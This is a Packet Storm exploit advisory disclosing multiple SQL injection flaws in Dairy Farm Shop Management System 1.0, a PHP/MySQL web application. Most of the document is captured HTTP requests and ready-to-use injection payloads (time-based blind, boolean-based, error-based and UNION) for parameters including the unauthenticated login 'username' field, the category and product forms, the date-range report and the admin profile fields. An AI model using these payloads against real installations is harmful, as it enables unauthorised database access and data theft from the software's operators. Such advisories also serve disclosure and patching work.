Dairy Farm Shop Management System 1.0 SQL Injection

2020-01-07T00:00:00
ID PACKETSTORM:155860
Type packetstorm
Reporter Chris Inzinga
Modified 2020-01-07T00:00:00

Description

                                        
                                            `# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection  
# Google Dork: N/A  
# Date: 2020-01-03  
# Exploit Author: Chris Inzinga  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/  
# Version: v1.0  
# Tested on: Windows  
# CVE: N/A  
  
# The Dairy Farm Shop Management System 1.0 web application is vulnerable to   
# SQL injection in multiple areas. The most severe of these is the username   
# parameter on the login page as this injection can be done unauthenticated.  
  
  
================================ 'username' - SQLi ================================  
  
POST /dfsms/index.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/index.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 34  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
username=test&password=test&login=  
  
---  
Parameter: username (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=test' AND (SELECT 5667 FROM (SELECT(SLEEP(5)))mKGL) AND 'UlkV'='UlkV&password=test&login=  
---  
[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.0.12  
  
  
  
================================ 'category' & 'categorycode' - SQLi ================================  
  
POST /dfsms/add-category.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-category.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 39  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
category=test&categorycode=test&submit=  
  
---  
Parameter: category (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: category=test' AND (SELECT 8892 FROM (SELECT(SLEEP(5)))WzFH) AND 'NELe'='NELe&categorycode=test&submit=  
---  
[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.0.12  
  
---  
Parameter: categorycode (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: category=test&categorycode=test' AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bzQA) AND 'izaK'='izaK&submit=  
---  
[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.0.12  
  
  
  
================================ 'companyname' - SQLi ================================  
  
---  
Parameter: companyname (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: companyname=test' AND (SELECT 7565 FROM (SELECT(SLEEP(5)))znna) AND 'bEUm'='bEUm&submit=  
---  
[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.0.12  
  
  
  
================================ 'productname' & 'productprice' - SQLi ================================  
  
---  
Parameter: productname (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: category=Milk&company=Amul&productname=test' AND (SELECT 1171 FROM (SELECT(SLEEP(5)))rlQI) AND 'RgaN'='RgaN&productprice=test&submit=  
---  
---  
Parameter: productprice (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: category=Milk&company=Amul&productname=test&productprice=test' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))BRuk) AND 'Imqh'='Imqh&submit=  
---  
[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.0.12  
  
  
  
================================ 'fromdate' & 'todate' - SQLi ================================  
  
---  
Parameter: todate (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)  
Payload: fromdate=2020-01-05&todate=-6737' OR 3099=3099#&submit=  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: fromdate=2020-01-05&todate=2020-01-31' OR (SELECT 3665 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(3665=3665,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mqby&submit=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: fromdate=2020-01-05&todate=2020-01-31' AND (SELECT 5717 FROM (SELECT(SLEEP(5)))adaE)-- cLAK&submit=  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 5 columns  
Payload: fromdate=2020-01-05&todate=2020-01-31' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162766271,0x666369456150614b454a4f51454e6e687449724a786445585455515a67614162754545716d476f6f,0x716a7a7171),NULL#&submit=  
  
Parameter: fromdate (POST)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: fromdate=2020-01-05' AND (SELECT 7128 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(7128=7128,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Tzxh&todate=2020-01-31&submit=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: fromdate=2020-01-05' AND (SELECT 7446 FROM (SELECT(SLEEP(5)))Aklw)-- uzkF&todate=2020-01-31&submit=  
---  
  
  
  
================================ 'mobilenumber' & 'emailid' & 'adminname' - SQLi ================================  
  
---  
Parameter: emailid (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: adminname=Admin&username=admin&emailid=admin@test.com' AND (SELECT 5884 FROM (SELECT(SLEEP(5)))EgFJ) AND 'kFGt'='kFGt&mobilenumber=1234567899&update=  
---  
---  
Parameter: adminname (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: adminname=Admin' AND (SELECT 5969 FROM (SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update=  
---  
---  
Parameter: mobilenumber (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update=  
`